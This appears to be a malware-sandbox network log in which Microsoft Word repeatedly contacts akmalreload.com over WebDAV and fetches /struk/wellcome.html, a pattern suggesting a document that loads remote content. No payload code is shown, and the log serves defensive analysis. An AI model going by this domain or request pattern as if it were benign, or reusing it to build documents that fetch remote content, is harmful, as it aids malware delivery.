      Content-Type: text/html; charset=utf-8
      Connection: close
      vary: Accept-Encoding
      last-modified: Wed, 20 Jul 2022 22:09:18 GMT
      dn-request-id: c0a5b2af1ee277e81ce3454d80cf2b32
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      Cache-Control: max-age=2592000
      static-cache-status: BYPASS
      expires: Sat, 20 Aug 2022 12:27:48 GMT
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UKGFYZR%2Bjqe3EBQm2fh0GJAdYADVSkKhMwJ32a%2BpxvCcpJh3Zj6w48QRHTq3lRMhYU78V0TkIrMyAZrEsql6rQ2otDC0GAPnmVh4tbNJ%2B5hdivo4Qieg9Qj7v1H93Ea2L0E%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3eecdba6a7306-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


      Session IDSource IPSource PortDestination IPDestination PortProcess
      18192.168.2.2249189104.21.73.122443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:49 UTC33OUTHEAD /struk/wellcome.html HTTP/1.1
      User-Agent: Microsoft Office Existence Discovery
      Host: akmalreload.com
      Content-Length: 0
      Connection: Keep-Alive
      2022-07-21 12:27:49 UTC33INHTTP/1.1 200 OK
      Date: Thu, 21 Jul 2022 12:27:49 GMT
      Content-Type: text/html; charset=utf-8
      Connection: close
      vary: Accept-Encoding
      last-modified: Wed, 20 Jul 2022 22:09:18 GMT
      dn-request-id: d13d9b48e2c5d4101b161c30541d1582
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      Cache-Control: max-age=2592000
      static-cache-status: BYPASS
      expires: Sat, 20 Aug 2022 12:27:49 GMT
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6bm1d4Z4pyUZYk0AKuA2BLjGuTz0HAkK1tWDDMeOXMWOKD0M%2BeMO5WeRLR%2BGmEUfjnEQrY1XJZfv4ARzKcr3NYpAP%2FojqufoCUD2Ki%2FEGkKvB4a7TU0LGvlpEQTOrig%2BtXQ%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3eed28f367318-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


      Session IDSource IPSource PortDestination IPDestination PortProcess
      2192.168.2.2249173104.21.73.122443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:29 UTC2OUTOPTIONS /struk HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
      translate: f
      Host: akmalreload.com
      2022-07-21 12:27:30 UTC2INHTTP/1.1 301 Moved Permanently
      Date: Thu, 21 Jul 2022 12:27:30 GMT
      Content-Type: text/html; charset=iso-8859-1
      Transfer-Encoding: chunked
      Connection: close
      location: https://akmalreload.com/struk/
      dn-request-id: a8bf9cdc5468f3f5baf6480e356ababd
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DwkX3KtW14nnn3dj6rdv6tlZ904Mdk7gSPqyVG%2Bri1Rq857BmxXKv8Qp%2BWwIMpasM8zVtCIlRVl3ilLbN6SphfMFscXFxMtyV2nAmKxSU1UUItFk01Mytnx8QBBIcP6S%2Bp8%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3ee557e7a71de-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
      2022-07-21 12:27:30 UTC4INData Raw: 65 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6b 6d 61 6c 72 65 6c 6f 61 64 2e 63 6f 6d 2f 73 74 72 75 6b 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
      Data Ascii: ee<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://akmalreload.com/struk/">here</a>.</p></body></html>
      2022-07-21 12:27:30 UTC4INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortProcess
      3192.168.2.2249174104.21.73.122443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:30 UTC4OUTOPTIONS /struk/ HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
      translate: f
      Host: akmalreload.com
      2022-07-21 12:27:31 UTC4INHTTP/1.1 200 OK
      Date: Thu, 21 Jul 2022 12:27:31 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      vary: Accept-Encoding
      dn-request-id: 8a88f308ec0754b029c91f02b750f335
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TIEK5AY97w2GXuetriWowq2m5s6kpFeFoKSGmvDiTC6XsMsCxwec%2B6%2FhrImkFohKgxE28d6ulcmPbjuQDHbHYLu%2BdW0kPu9wH2ugRwLffzCb7sFolUgvf%2FnErXe4u5UtfGE%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3ee5b5aae0635-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
      2022-07-21 12:27:31 UTC5INData Raw: 31 35 33 0d 0a 7b 22 30 22 3a 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 4b 4f 4e 54 45 52 20 5c 6e 53 54 52 55 4b 20 50 45 4d 42 41 59 41 52 41 4e 5c 6e 54 41 47 49 48 41 4e 20 54 56 5c 6e 20 20 20 20 5c 6e 54 41 4e 47 47 41 4c 20 20 20 20 3a 20 5c 6e 49 44 20 50 45 4c 20 20 20 20 20 3a 20 5c 6e 4e 41 4d 41 20 20 20 20 20 20 20 3a 20 50 75 6c 73 61 20 30 5c 6e 50 45 52 49 4f 44 45 20 20 20 20 3a 20 5c 6e 52 50 20 54 41 47 20 20 20 20 20 3a 20 52 70 20 5c 6e 41 44 4d 49 4e 20 42 41 4e 4b 20 3a 20 52 70 20 5c 6e 52 50 20 42 41 59 41 52 20 20 20 3a 20 52 70 20 5c 6e 52 45 46 20 20 20 20 20 20 20 20 3a 20 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 5c 6e 5c 6e 54 65 72 69 6d 61 6b 61 73 69 68 20 61 74 61 73 20 6b 65 70 65 72 63 61 79 61 61 6e 20 41 6e 64 61 20 6d
      Data Ascii: 153{"0":{"content":"KONTER \nSTRUK PEMBAYARAN\nTAGIHAN TV\n \nTANGGAL : \nID PEL : \nNAMA : Pulsa 0\nPERIODE : \nRP TAG : Rp \nADMIN BANK : Rp \nRP BAYAR : Rp \nREF : \n \n\nTerimakasih atas kepercayaan Anda m
      2022-07-21 12:27:31 UTC5INData Raw: 75 6b 20 69 6e 69 20 73 65 62 61 67 61 69 20 62 75 6b 74 69 20 70 65 6d 62 61 79 61 72 61 6e 20 79 61 6e 67 20 73 61 68 2e 5c 6e 5c 6e 22 7d 7d 0d 0a
      Data Ascii: uk ini sebagai bukti pembayaran yang sah.\n\n"}}
      2022-07-21 12:27:31 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortProcess
      4192.168.2.2249175104.21.73.122443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:32 UTC5OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 74 72 75 6b 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 61 6b 6d 61 6c 72 65 6c 6f 61 64 2e 63 6f 6d 0d 0a 0d 0a
      Data Ascii: PROPFIND /struk HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: akmalreload.com
      2022-07-21 12:27:32 UTC5INHTTP/1.1 301 Moved Permanently
      Date: Thu, 21 Jul 2022 12:27:32 GMT
      Content-Type: text/html; charset=iso-8859-1
      Transfer-Encoding: chunked
      Connection: close
      location: https://akmalreload.com/struk/
      dn-request-id: 433d9ea9354924e5e79bf246cf034368
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UQKgzos4NfBVlDY9nOMko6bcA8WdiTJNDNkClkOlupTNpL%2FpSDSyCQfnx5%2F1mLOdSpCcFWvcN%2BkkBfXjBADOSo59SJN8RX5aNVhDZDmO57gaxNrMO2ONIJE4vCUVVhMnIXE%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3ee6668e076db-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
      2022-07-21 12:27:32 UTC7INData Raw: 65 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6b 6d 61 6c 72 65 6c 6f 61 64 2e 63 6f 6d 2f 73 74 72 75 6b 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
      Data Ascii: ee<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://akmalreload.com/struk/">here</a>.</p></body></html>
      2022-07-21 12:27:32 UTC7INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortProcess
      5192.168.2.2249176104.21.73.122443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:33 UTC7OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 74 72 75 6b 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 61 6b 6d 61 6c 72 65 6c 6f 61 64 2e 63 6f 6d 0d 0a 0d 0a
      Data Ascii: PROPFIND /struk/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: akmalreload.com
      2022-07-21 12:27:33 UTC7INHTTP/1.1 200 OK
      Date: Thu, 21 Jul 2022 12:27:33 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      vary: Accept-Encoding
      dn-request-id: c8c26ba67b8bde1bc32dc44e598a76f1
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Hr7KJ3yq4re7gP7c7kYjTwtHP7ao650N2Vkfk2ZFbOZqFVkOBuarkdjXBbj1g5%2FE3e7Ksbs4DIIYavfK2B36kjtkNyOOvS0PQV4FXPfVaIIFiB96q2P96U41kDumKz3SS60%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3ee6c5ec7004e-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
      2022-07-21 12:27:33 UTC8INData Raw: 31 35 33 0d 0a 7b 22 30 22 3a 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 4b 4f 4e 54 45 52 20 5c 6e 53 54 52 55 4b 20 50 45 4d 42 41 59 41 52 41 4e 5c 6e 54 41 47 49 48 41 4e 20 54 56 5c 6e 20 20 20 20 5c 6e 54 41 4e 47 47 41 4c 20 20 20 20 3a 20 5c 6e 49 44 20 50 45 4c 20 20 20 20 20 3a 20 5c 6e 4e 41 4d 41 20 20 20 20 20 20 20 3a 20 50 75 6c 73 61 20 30 5c 6e 50 45 52 49 4f 44 45 20 20 20 20 3a 20 5c 6e 52 50 20 54 41 47 20 20 20 20 20 3a 20 52 70 20 5c 6e 41 44 4d 49 4e 20 42 41 4e 4b 20 3a 20 52 70 20 5c 6e 52 50 20 42 41 59 41 52 20 20 20 3a 20 52 70 20 5c 6e 52 45 46 20 20 20 20 20 20 20 20 3a 20 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 5c 6e 5c 6e 54 65 72 69 6d 61 6b 61 73 69 68 20 61 74 61 73 20 6b 65 70 65 72 63 61 79 61 61 6e 20 41 6e 64 61 20 6d
      Data Ascii: 153{"0":{"content":"KONTER \nSTRUK PEMBAYARAN\nTAGIHAN TV\n \nTANGGAL : \nID PEL : \nNAMA : Pulsa 0\nPERIODE : \nRP TAG : Rp \nADMIN BANK : Rp \nRP BAYAR : Rp \nREF : \n \n\nTerimakasih atas kepercayaan Anda m
      2022-07-21 12:27:33 UTC8INData Raw: 20 73 65 62 61 67 61 69 20 62 75 6b 74 69 20 70 65 6d 62 61 79 61 72 61 6e 20 79 61 6e 67 20 73 61 68 2e 5c 6e 5c 6e 22 7d 7d 0d 0a
      Data Ascii: sebagai bukti pembayaran yang sah.\n\n"}}
      2022-07-21 12:27:33 UTC8INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortProcess
      6192.168.2.2249177104.21.73.122443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:35 UTC8OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 74 72 75 6b 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 61 6b 6d 61 6c 72 65 6c 6f 61 64 2e 63 6f 6d 0d 0a 0d 0a
      Data Ascii: PROPFIND /struk HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: akmalreload.com
      2022-07-21 12:27:35 UTC9INHTTP/1.1 301 Moved Permanently
      Date: Thu, 21 Jul 2022 12:27:35 GMT
      Content-Type: text/html; charset=iso-8859-1
      Transfer-Encoding: chunked
      Connection: close
      location: https://akmalreload.com/struk/
      dn-request-id: 43b7abe98c800f5f08f82d992b47a481
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rC6fl9IEW7Wt8dQZwjcS5vnWLr%2Fqht1hAUrtKuBCA8W1%2B08U9ln%2B20Saic5513PPmamsFGFRBKF5GV6e12Iql56mGp4PbEdXN4%2FASaHiGlp5%2FJMKiLk%2BLBmuNEGrWgIR2wQ%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3ee796b5a7583-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
      2022-07-21 12:27:35 UTC10INData Raw: 65 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6b 6d 61 6c 72 65 6c 6f 61 64 2e 63 6f 6d 2f 73 74 72 75 6b 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
      Data Ascii: ee<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://akmalreload.com/struk/">here</a>.</p></body></html>
      2022-07-21 12:27:35 UTC10INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortProcess
      7192.168.2.2249178104.21.73.122443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:36 UTC10OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 74 72 75 6b 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 61 6b 6d 61 6c 72 65 6c 6f 61 64 2e 63 6f 6d 0d 0a 0d 0a
      Data Ascii: PROPFIND /struk/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: akmalreload.com
      2022-07-21 12:27:36 UTC10INHTTP/1.1 200 OK
      Date: Thu, 21 Jul 2022 12:27:36 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      vary: Accept-Encoding
      dn-request-id: 5a29f55c090fcb04e91191251d288330
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yl9WMIwi0HGEInOc0ZKbSf7yjQDnpFy5bcP5tevX6A2%2B0Z1cgnN7f2iwHfqmnOUKuJexMYRkXNu0TzTNjPKENL9xjtnHG1vrMVfBWIjkAKKbRqk3RnbsrVfBtw%2B7w12HRA8%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3ee7f586206d9-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
      2022-07-21 12:27:36 UTC11INData Raw: 31 35 33 0d 0a 7b 22 30 22 3a 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 4b 4f 4e 54 45 52 20 5c 6e 53 54 52 55 4b 20 50 45 4d 42 41 59 41 52 41 4e 5c 6e 54 41 47 49 48 41 4e 20 54 56 5c 6e 20 20 20 20 5c 6e 54 41 4e 47 47 41 4c 20 20 20 20 3a 20 5c 6e 49 44 20 50 45 4c 20 20 20 20 20 3a 20 5c 6e 4e 41 4d 41 20 20 20 20 20 20 20 3a 20 50 75 6c 73 61 20 30 5c 6e 50 45 52 49 4f 44 45 20 20 20 20 3a 20 5c 6e 52 50 20 54 41 47 20 20 20 20 20 3a 20 52 70 20 5c 6e 41 44 4d 49 4e 20 42 41 4e 4b 20 3a 20 52 70 20 5c 6e 52 50 20 42 41 59 41 52 20 20 20 3a 20 52 70 20 5c 6e 52 45 46 20 20 20 20 20 20 20 20 3a 20 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 5c 6e 5c 6e 54 65 72 69 6d 61 6b 61 73 69 68 20 61 74 61 73 20 6b 65 70 65 72 63 61 79 61 61 6e 20 41 6e 64 61 20 6d
      Data Ascii: 153{"0":{"content":"KONTER \nSTRUK PEMBAYARAN\nTAGIHAN TV\n \nTANGGAL : \nID PEL : \nNAMA : Pulsa 0\nPERIODE : \nRP TAG : Rp \nADMIN BANK : Rp \nRP BAYAR : Rp \nREF : \n \n\nTerimakasih atas kepercayaan Anda m
      2022-07-21 12:27:36 UTC11INData Raw: 6e 69 20 73 65 62 61 67 61 69 20 62 75 6b 74 69 20 70 65 6d 62 61 79 61 72 61 6e 20 79 61 6e 67 20 73 61 68 2e 5c 6e 5c 6e 22 7d 7d 0d 0a
      Data Ascii: ni sebagai bukti pembayaran yang sah.\n\n"}}
      2022-07-21 12:27:36 UTC11INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortProcess
      8192.168.2.2249179104.21.73.122443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:37 UTC11OUTGET /struk/wellcome.html HTTP/1.1
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      Host: akmalreload.com
      Connection: Keep-Alive
      2022-07-21 12:27:37 UTC12INHTTP/1.1 200 OK
      Date: Thu, 21 Jul 2022 12:27:37 GMT
      Content-Type: text/html; charset=utf-8
      Transfer-Encoding: chunked
      Connection: close
      vary: Accept-Encoding
      last-modified: Wed, 20 Jul 2022 22:09:18 GMT
      dn-request-id: 0fc3696f9ea71b9717a1db4a637715c6
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      Cache-Control: max-age=2592000
      static-cache-status: BYPASS
      expires: Sat, 20 Aug 2022 12:27:37 GMT
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DQXeOp%2F20TgCYi3MsRVhMsq0eD0AxJBLWv8SWXPfUJiSJIJ35i3kSxMVmwdlDjhuwI%2BBt8OYnZXHsS9LLf4XjjFLq3LLIGQAd9LnK7urm8m91T7jcUZFQR%2FEwRMnUkrD1lc%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3ee848e1e7199-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
